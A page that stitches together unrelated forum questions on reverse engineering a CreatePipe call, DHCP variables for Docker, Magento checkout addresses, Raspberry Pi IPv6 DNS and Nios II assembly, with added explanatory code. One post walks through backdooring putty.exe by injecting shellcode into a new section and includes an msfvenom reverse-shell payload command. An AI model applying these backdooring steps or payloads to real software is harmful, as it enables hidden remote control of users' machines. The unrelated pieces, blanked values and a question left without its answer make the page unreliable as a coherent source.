Meaning of strange Pointer in assembly code – is this a vector table address?

Apologies if this is a silly question, but I’m confused. I’m working on a reverse engineering assignment. While looking at a disassembled dll of possibly malicious code, I found these lines:

    push nsize                  ;  makes sense
    push offset Security_Attr   ;  makes sense
    push 80h                    ;  this address does not make sense
    push offset read_buf        ;  makes sense
    call CreatePipe             ;  makes sense

This is calling a Windows function called CreatePipe. “80h” should point to a buffer that the pipe writes to. The value just seems way too small! Is this address pointing to the user_interrupt section of the vector table? If so, is this pipe overwriting user_interrupt handlers in the vector table?

Any pointers are appreciated.
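Added example, not code from the question: on x86 the Win32 calling convention (stdcall) pushes arguments right to left, so the pushes in a listing like the one above can be bound to CreatePipe's documented parameters (hReadPipe, hWritePipe, lpPipeAttributes, nSize) by reversing them; the helper also flags immediates below 64 KiB, a range that is never mapped in Win32 user-mode address space and so can never be a valid pointer. The listing is a copy of the question's, with the comments dropped.

```python
import re

# Added example, not from the question: bind the pushes that precede a
# Win32 call to the callee's parameters.  Win32 APIs use stdcall, where
# arguments are pushed right to left: the LAST push is the FIRST parameter.
CREATEPIPE_PARAMS = ["hReadPipe", "hWritePipe", "lpPipeAttributes", "nSize"]

# Copy of the listing from the question (comments dropped).
LISTING = """
push nsize
push offset Security_Attr
push 80h
push offset read_buf
call CreatePipe
"""

PUSH_RE = re.compile(r"^\s*push\s+(.+?)\s*(?:;.*)?$", re.I)
CALL_RE = re.compile(r"^\s*call\s+\w+", re.I)


def bind_args(listing, params):
    """Return {parameter: pushed operand} for the CALL that ends `listing`.

    Only the last len(params) pushes before the CALL are used, so earlier,
    unrelated pushes are ignored.
    """
    pushes = []
    for line in listing.strip().splitlines():
        m = PUSH_RE.match(line)
        if m:
            pushes.append(m.group(1).strip())
        elif CALL_RE.match(line):
            break
    if len(pushes) < len(params):
        raise ValueError("fewer pushes than parameters")
    args = pushes[-len(params):][::-1]      # reverse: last push = 1st param
    return dict(zip(params, args))


def is_plausible_user_pointer(operand):
    """False for an immediate below 64 KiB: on Win32 the first 64 KiB of
    user address space is never mapped, so such a value cannot be a valid
    pointer.  Symbolic operands (offset X, registers) cannot be judged."""
    m = re.fullmatch(r"([0-9A-Fa-f]+)h|0x([0-9A-Fa-f]+)|(\d+)", operand)
    if not m:
        return True
    hex_digits = m.group(1) or m.group(2)
    value = int(hex_digits, 16) if hex_digits else int(m.group(3))
    return value >= 0x10000
```

Running `bind_args(LISTING, CREATEPIPE_PARAMS)` pairs each push with the parameter it feeds, which is the first thing to settle before asking what an odd-looking operand means.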

How can I create an environment variable that contains the IP address of an adapter that is set via DHCP?

I am using Docker and my scripts reference an environment variable that I’m manually setting in user foo’s /etc/environment like:


which I’m using in my docker-compose file (which I’m running as foo):

    environment:
      - ServerIP=${SERVER_IP}

I would like to have a variable DHCP_IP that is populated when adapter enp0s3 has its IP address set, so that I can use DHCP_IP in place of SERVER_IP in the docker-compose above.

I’m not concerned about the IP address changing often as I’m using MAC address filtering in my router to assign the same IP. But I don’t want to have to set the IP address manually in a file like I’m doing now.

So how can I put the value of the IP address of enp0s3 into a variable called DHCP_IP, and how can I reference that at the command line or in a file?

Or if you know of an alternative, I’m open to suggestions.
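One way to do what the question asks, as an added example that is not from the question: read the address currently on enp0s3 with iproute2's `ip` (assumed to be installed), and write it as DHCP_IP into an env file that docker-compose reads, so `${DHCP_IP}` can replace `${SERVER_IP}` in the compose file. The interface name comes from the question; the sample `ip` output is constructed for a dry run.

```sh
#!/bin/sh
# Added example, not from the question: export DHCP_IP from the address
# currently on enp0s3 (iproute2 `ip` assumed; interface name from the question).
IFACE="${IFACE:-enp0s3}"

# Print the first IPv4 address found in `ip -4 -o addr` output ($1),
# stripped of its /prefix; prints nothing if there is none.
extract_ipv4() {
    printf '%s\n' "$1" | awk '$3 == "inet" { sub("/.*", "", $4); print $4; exit }'
}

# Address the interface holds right now (empty if down or unconfigured).
current_dhcp_ip() {
    extract_ipv4 "$(ip -4 -o addr show dev "$IFACE" 2>/dev/null)"
}

# Write DHCP_IP=<addr> ($1) into env file $2, replacing any previous
# DHCP_IP line and keeping everything else (works for .env or /etc/environment).
write_env_file() {
    [ -n "$1" ] || { echo "no IPv4 address on $IFACE" >&2; return 1; }
    tmp="$2.tmp.$$"
    if [ -f "$2" ]; then
        grep -v '^DHCP_IP=' "$2" > "$tmp" || true   # grep exits 1 if nothing is left
    else
        : > "$tmp"
    fi
    printf 'DHCP_IP=%s\n' "$1" >> "$tmp" && mv "$tmp" "$2"
}

# Constructed sample of `ip -4 -o addr show dev enp0s3` output for a dry run.
SAMPLE='2: enp0s3    inet 192.0.2.10/24 brd 192.0.2.255 scope global dynamic enp0s3\       valid_lft 86314sec preferred_lft 86314sec'

# Usage (as user foo, from a DHCP client hook or just before docker-compose up):
#   write_env_file "$(current_dhcp_ip)" "$HOME/project/.env"
# docker-compose substitutes ${DHCP_IP} from the .env file next to the compose file.
```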

Force quote_address instead of customer address when browser is refreshed Magento 2

I am new to Magento 2 and having a hard time understanding how the code below is getting shipping address data for display on the checkout/#payment page. It displays the correct address when we go from the shipping to the payment page, but switches to the 1st address from the user’s address book when I hit refresh on the payment page. I understand that the user addresses are coming from DefaultConfigProvider (vendor/magento/module-checkout/Model/DefaultConfigProvider.php), which is ultimately getting them from the customer repository (customer_address_entity table). My requirement is to display quote_address, not the customer address, even when the browser has been refreshed knowingly or unknowingly.

    <!-- ko foreach: getRegion('ship-to') -->
        <!-- ko template: getTemplate() -->
        <!--/ko-->
    <!--/ko-->

I read about implementing Observable but am not sure where to start, since I couldn’t understand how the addresses are switching.

Any help is greatly appreciated since I am losing my mind over this and it appears that Magento is hard to debug?


how to get address of PE section to jump in while backdooring PE binary

I am trying to follow this tutorial to backdoor a simple 32-bit PE binary (putty.exe).

The method used is to create a new section (named .test) containing some shellcode, change the first CALL instruction to a JMP to it, execute it, and JMP back to the original address the first CALL instruction contained before it was changed to a JMP.

The first part is adding the new section, and I am OK with it (done with LordPE). Here are its characteristics:

    Name    VOffset    VSize     ROffset   RSize    Flags
    .test   00110000   00001000  00106E00  00001000 E0000060

In immunity, I have loaded putty.exe. Memory view shows me that .test section is getting mapped at address 00510000

Here are the first instructions being launched:

    7D4D1512 PUSH EAX
    0046F346 CALL putty.      <--- I changed this for JMP putty.00510000
    0046F34B JMP putty.

In debug mode it indeed JMPs to 00510000! So I copy/paste the payload at this place and debug again. The payload was created via:

    msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f hex

I save the binary and re-launch Immunity to debug it:

    7D4D1512 PUSH EAX
    0046F346 JMP putty.00510000

But the JMP now lands at the very end of the shellcode, at 0051008E!

Filling the beginning of the section with NOPs does not change the behavior (it always lands at the end of the shellcode).

How is it possible to force the execution flow to the beginning of my shellcode instead? As no one seems to have encountered this trouble, I suppose I missed some basics.

The document explains how the address is calculated like this:

Next step is to hijack the first instruction by jumping to our new section, for that we need the RVA for both the .test section, first CALL instruction and address of the next instruction.

    001C9DE6 > $   E8 15770000    CALL PsExec_b.001D1500
    001C9DEB .^E9 7BFEFFFF        JMP PsExec_b.001C9C6B

RVA of 001D1500 is RVA_11500. RVA of 001C9DEB is RVA_9DEB, RVA of .test is RVA_7D0000.

I have no idea how he gets from 001D1500 to 11500 and what is the 1C0000 gap between these two values.

Many thanks for your help understanding this point.
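As an added example (not code from the question or from the tutorial it follows), the address arithmetic the quoted tutorial relies on: an RVA is a virtual address minus the base the image was actually loaded at, so a constant 1C0000 gap between the VAs and RVAs in the tutorial means that its image was loaded at 001C0000, and the debugger's 00510000 for .test is the section's RVA 00110000 plus the base putty.exe was loaded at; the same RVA maps back into the file through the section table. The section values are the ones from the table in the question.

```python
from dataclasses import dataclass
from typing import List, Optional

# Added example, not from the question or the tutorial: the address
# arithmetic behind RVAs, load bases and file offsets in a PE image.

@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int   # RVA where the section is mapped (VOffset)
    virtual_size: int      # bytes occupied in memory        (VSize)
    raw_pointer: int       # offset of its bytes in the file (ROffset)
    raw_size: int          # bytes stored in the file        (RSize)

# The .test section exactly as listed in the question.
TEST_SECTION = Section(".test", 0x00110000, 0x1000, 0x00106E00, 0x1000)

def va_to_rva(va: int, image_base: int) -> int:
    """RVA = virtual address - base the image was actually loaded at."""
    if va < image_base:
        raise ValueError("address lies below the image base")
    return va - image_base

def rva_to_va(rva: int, image_base: int) -> int:
    return image_base + rva

def load_base_from_observation(observed_va: int, rva: int) -> int:
    """Base a module was loaded at (ASLR can move it), recovered from one
    address seen in the debugger and the RVA it corresponds to."""
    return observed_va - rva

def find_section(rva: int, sections: List[Section]) -> Optional[Section]:
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s
    return None

def rva_to_file_offset(rva: int, sections: List[Section]) -> int:
    """Offset in the file of the byte that sits at `rva` in memory.
    Fails outside every section, or in the memory-only tail of a section
    (VSize > RSize, e.g. .bss) that has no bytes on disk."""
    s = find_section(rva, sections)
    if s is None:
        raise ValueError(f"RVA {rva:#x} is not inside any section")
    delta = rva - s.virtual_address
    if delta >= s.raw_size:
        raise ValueError(f"RVA {rva:#x} has no backing bytes in the file")
    return s.raw_pointer + delta
```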

How to make raspberry pi to inform DNS server on router of its IPv6 address? [on hold]

Hosts on my local network get addresses from the AT&T gateway. I can see all devices with their IPv4 and IPv6 addresses in the “Device List” tab of the router web interface. The router also serves as a DNS server for the local network, and I can use the host command to resolve a host name to its IPv4 and IPv6 addresses, e.g.

    $ host grigorys-iphone
    grigorys-iphone has address 
    grigorys-iphone has IPv6 address XXXX:XXXX:XXX:XXXX::d
    grigorys-iphone has IPv6 address XXXX:XXXX:XXX:XXXX:4d8a:9ff1:b0dd:a649
    grigorys-iphone has IPv6 address fe80::1404:1dc:35b6:adc

    $ host desktop
    desktop has address 
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:1c55:5137:1f5:42e7
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:9833:6f77:822c:160e
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:41fb:5421:5a8d:6764
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:643f:dcac:8d2e:d67e
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:891c:a3e6:113f:17fe
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:28d9:3a12:d68f:9fb7
    desktop has IPv6 address fe80::a1a5:5b60:e49f:fa87
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:a1a5:5b60:e49f:fa87
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX::48
    desktop has IPv6 address XXXX:XXXX:XXX:XXXX:58be:e692:b62:52ba

But when I try the same with Raspberry Pi I get just this

    $ host raspberrypi
    raspberrypi has address 

and no IPv6 address, despite it having IPv6 both from DHCPv6 and SLAAC:

    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet  netmask  broadcast 
            inet6 fe80::9ae2:e23b:9ae2:872d  prefixlen 64  scopeid 0x20<link>
            inet6 XXXX:XXXX:XXX:XXXX:c54d:5708:6026:d6f3  prefixlen 64  scopeid 0x0<global>
            inet6 XXXX:XXXX:XXX:XXXX::2c  prefixlen 128  scopeid 0x0<global>
            ether b8:27:eb:fb:2b:8f  txqueuelen 1000  (Ethernet)
            RX packets 4474  bytes 934126 (912.2 KiB)
            RX errors 0  dropped 739  overruns 0  frame 0
            TX packets 362  bytes 55447 (54.1 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

What is even strange is that router does know about Raspberry Pi’s acquired IPv6 addresses and I see them in the address list:

    MAC Address          b8:27:eb:fb:2b:8f
    IPv4 Address / Name  / raspberrypi
    Last Activity        Sat Mar 23 22:18:47 2019
    Status               on
    Allocation           dhcp
    Connection Type      Wi-Fi
    Wi-Fi                4 bars 5 GHz  Type: Home  Name: MyWiFiSSID
    Mesh Client          No
    IPv6 Address         XXXX:XXXX:XXX:XXXX::2c
    Type                 dhcp
    Valid Lifetime       3600s
    Preferred Lifetime   3600s
    IPv6 Address         XXXX:XXXX:XXX:XXXX:c54d:5708:6026:d6f3
    Type                 slaac
    Valid Lifetime       3600s
    Preferred Lifetime   3600s
    IPv6 Address         fe80::9ae2:e23b:9ae2:872d
    Type                 slaac
    Valid Lifetime       forever
    Preferred Lifetime   forever

But no information about the IPv6 addresses comes from the DNS server. I tried adding the inform6 option (no arguments) to /etc/dhcpcd.conf and rebooted the Raspberry Pi, but that didn’t change anything.

The question is, how do I make Raspbian on the Raspberry Pi behave like all the other hosts on the local network, so that the DNS server on the router knows its IPv6 addresses? What am I missing?

what does “Memory access to address 00000030 looks like unallocated stack space.” warning mean? [on hold]

Nios II assembly language:

    ADDR_SSEGNUMS: .word 0x4F5B063F, 0x077D6D66, 0x6F7F
    Arr:    .hword 0x00000006
            .hword 0x0000005B
            .hword 0x0000004F
            .hword 0x00000066
            .hword 0x0000006D
            .hword 0x0000007D
            .hword 0x00000007
            .hword 0x0000007F
            .hword 0x00000067

    .global _start
    _start:
    /* initialize base addresses of parallel ports */
    movia r18, 0x10000000       /* red LED base address */
    movia r19, 0x10000010       /* green LED base address */
    movia r20, 0x10000020       /* HEX3_HEX0 base address */
    movia r21, 0x10000030       /* HEX4_HEX7 base address */
    movia r22, 0x10000050       /* pushbutton KEY base address */
    movia r23, 0x10002000       /* interval timer (onboard 50 MHz clock) base address */
    movia r17, ADDR_SSEGNUMS
    movui r10, 10
    movia r24, Arr
    movi r25, 9
    movi r26, 0

    /* load timer countdown value */
    movui r3, 0x02af            /* upper 16-bits of 500000 countdown value */
    sthio r3, 12(r23)           /* write to timer start value (high) register */
    movui r3, 0xf080            /* lower 16-bits of 500000 countdown value */
    sthio r3, 8(r23)            /* write to timer start value (low) register */
    movi r8, 0x4

    /* start and continue timer countdown with no interrupts */
    movui r3, 0x6               /* load timer control value */
    sthio r3, 4(r23)            /* write to timer control register */

    PRESS_A_KEY_TO_START:
    /* press a pushbutton to start counter */
    ldwio r2, 0(r22)            /* load input from pushbuttons */
    stwio r2, 0(r19)            /* write to green LEDs */
    ble r2, r8, PRESS_A_KEY_TO_START

    /* monitor timeout signal to identify when the timer countdown ends (reach 0) */
    WAIT_FOR_TO_SIGNAL:
    ldhio r3, 0(r23)            /* load status register */
    andi r3, r3, 1              /* load timeout (TO) bit */
    beq r3, r0, WAIT_FOR_TO_SIGNAL  /* wait until timer timeout (TO is set to 1) */

    add r4, r4, r3              /* count number of timeouts */
    divu r5, r4, r10
    mul r5, r5, r10
    sub r5, r4, r5
    stwio r5, 0(r18)
    ble r5, r10, loop1

    loop1:
    bge r26, r25, _start        /* compare the size of the array with the counter */
    ldb r7, 0(r24)              /* load the least significant bit */
    addi r24, r24, 2            /* increment */
    addi r26, r26, 1
    display:
    add r27, r7, r0
    add r9, r7, r0
    stwio r27, 0(r20)           /* display the contents of r8 in the first four segment */
    movia r29, 1000000
    DELAY:
    subi r29, r29, 4
    bne r29, r0, DELAY          /* shift the values of the register by 8 bits */
    stwio r27, 0(r20)

    bne r29, r0, loop3          /* if register values are not equal go to loop3 */

    stwio r28, 0(r20)           /* display count of timeouts on LEDR */
    stwio r0, 0(r23)            /* reset TO bit in status register */
    br WAIT_FOR_TO_SIGNAL